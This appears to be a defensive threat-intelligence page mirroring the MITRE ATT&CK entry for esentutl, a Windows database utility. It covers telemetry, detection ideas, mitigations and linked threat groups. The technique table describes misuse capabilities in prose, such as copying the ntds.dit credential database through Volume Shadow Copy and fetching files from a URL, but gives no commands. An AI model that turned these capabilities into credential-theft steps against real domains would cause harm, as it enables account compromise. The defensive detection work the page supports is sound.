S0404: esentutl
Analyst context for executives and security teams
esentutl is a legitimate Windows command-line utility for Extensible Storage Engine database maintenance. Its security significance is that ATT&CK links it to behaviors around copying or accessing sensitive local data, including Active Directory NTDS content, direct volume access, file transfer, and hiding data with NTFS attributes. For leaders, this is a “living off the land” concern: the tool may be present by default or approved for administration, so risk decisions depend on whether use is expected, monitored, and explainable on critical Windows systems such as domain controllers.
Executive priority
Prioritize validation on Windows assets where database, identity, and sensitive local data exposure would materially affect business continuity or incident scope. Because this object has no MITRE-provided detection guidance and no ATT&CK tactic assigned directly to the tool, executives should ask whether SOC and IR teams can distinguish routine administrative esentutl activity from suspicious use tied to credential access, local data collection, stealth, or file transfer behaviors. This is especially relevant for identity protection, audit evidence, ransomware/extortion readiness, and incident decision-making involving domain controllers or sensitive file stores.
Technical view
For SOC, detection engineering, and IR teams, treat esentutl as a legitimate Windows binary whose context determines risk. Validate process execution visibility for esentutl, command-line capture, parent/child process lineage, user identity, host role, file paths touched, and resulting file creation or movement. Relationship context ties this tool to T1003.003 NTDS, T1005 Data from Local System, T1006 Direct Volume Access, T1105 Ingress Tool Transfer, T1564.004 NTFS File Attributes, and T1570 Lateral Tool Transfer. Detection should therefore focus on unusual execution on domain controllers, access to NTDS-related paths or database files, unexpected output locations, direct volume-style access patterns where observable, and follow-on movement of generated files across internal systems.
Likely telemetry
- Windows process creation events including executable name, full command line, parent process, user, integrity level, and host
- File access and file creation telemetry for database files, NTDS-related locations, temporary output paths, and unusual archives or copied files
- Domain controller and critical server audit logs, especially where identity databases or sensitive local data are present
- Endpoint detection telemetry for direct volume access indicators and suspicious file-system interactions where supported
- File transfer evidence such as SMB copy activity, internal staging paths, and movement of generated files between Windows systems
Detection direction
- Baseline legitimate administrative esentutl use by server role, user, maintenance window, parent process, and expected command patterns before alerting broadly.
- Prioritize high-severity review when esentutl executes on domain controllers or systems containing sensitive local databases, especially when output files are created outside normal administrative paths.
- Correlate execution with subsequent file movement, staging, or transfer activity because ATT&CK relationships include ingress and lateral tool transfer behaviors.
- Tune for context rather than tool name alone; esentutl can be legitimate, so false positives may come from backup, repair, or database maintenance operations.
- Look for gaps in command-line logging, endpoint file telemetry, and domain controller visibility; without these, defenders may only see the tool after sensitive data has already been copied.
Mitigation priorities
- Inventory where esentutl exists and where it is legitimately used, with special attention to domain controllers and critical Windows servers.
- Restrict administrative rights and interactive access on systems containing identity databases or sensitive local data; require documented change or maintenance justification for expected use.
- Ensure process command-line logging, file auditing, and endpoint telemetry are enabled on priority Windows assets before depending on detections.
- Harden domain controller operations and backup handling so copies of NTDS-related data are protected, monitored, and reviewed.
- Review internal file sharing and staging locations for controls that limit unnecessary lateral transfer of sensitive files.
Analyst notes and limits
The main decision value is not that esentutl is malicious; it is a legitimate Microsoft utility that can become material when used in contexts associated with credential access, data collection, stealth, or file movement. ATT&CK relationship context also lists groups that use this object, including menuPass, Chimera, and INC Ransom, but the supplied data should be treated as historical relationship context rather than evidence of current activity in any environment.
MITRE provides no official detection text for this object, no direct tactics for the tool itself, and only Windows as the platform for the software entry. Several related techniques list additional platforms, but platform claims for esentutl should remain Windows-scoped. Local baselines, administrative procedures, endpoint telemetry quality, and domain controller logging are required to determine whether observed use is suspicious.
esentutl
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1006 | Direct Volume Access | esentutl can use the Volume Shadow Copy service to copy locked files such as `ntds.dit`.CitationLOLBAS EsentutlCitationCary Esentutl |
| Enterprise | T1570 | Lateral Tool Transfer | esentutl can be used to copy files to/from a remote share.CitationLOLBAS Esentutl |
| Enterprise | T1003.003 | NTDS Sub-technique | esentutl can copy `ntds.dit` using the Volume Shadow Copy service.CitationLOLBAS EsentutlCitationCary Esentutl |
| Enterprise | T1564.004 | NTFS File Attributes Sub-technique | esentutl can be used to read and write alternate data streams.CitationLOLBAS Esentutl |
| Enterprise | T1105 | Ingress Tool Transfer | esentutl can be used to copy files from a given URL.CitationLOLBAS Esentutl |
| Enterprise | T1005 | Data from Local System | esentutl can be used to collect data from local file systems.CitationRed Canary 2021 Threat Detection Report March 2021 |
Groups, software, and campaigns
G0114: Chimera
G1032: INC Ransom
INC Ransom is a ransomware and data extortion threat group associated with the deployment of INC Ransomware that has been active since at least July 2023. INC Ransom has targeted organizations worldwide most commonly in the industrial, healthcare, and education sectors in the US and Europe.[1][2][3][4]
G0045: menuPass
menuPass is a threat group that has been active since at least 2006. Individual members of menuPass are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.[1][2]
menuPass has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.[3][4][5][6][7][1][2]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.3 | Current bundle | 8b4478d54177… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Microsoft Esentutl
Microsoft. (2016, August 30). Esentutl. Retrieved September 3, 2019.
Open source URL -
[2]
mitre-attack S0404Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.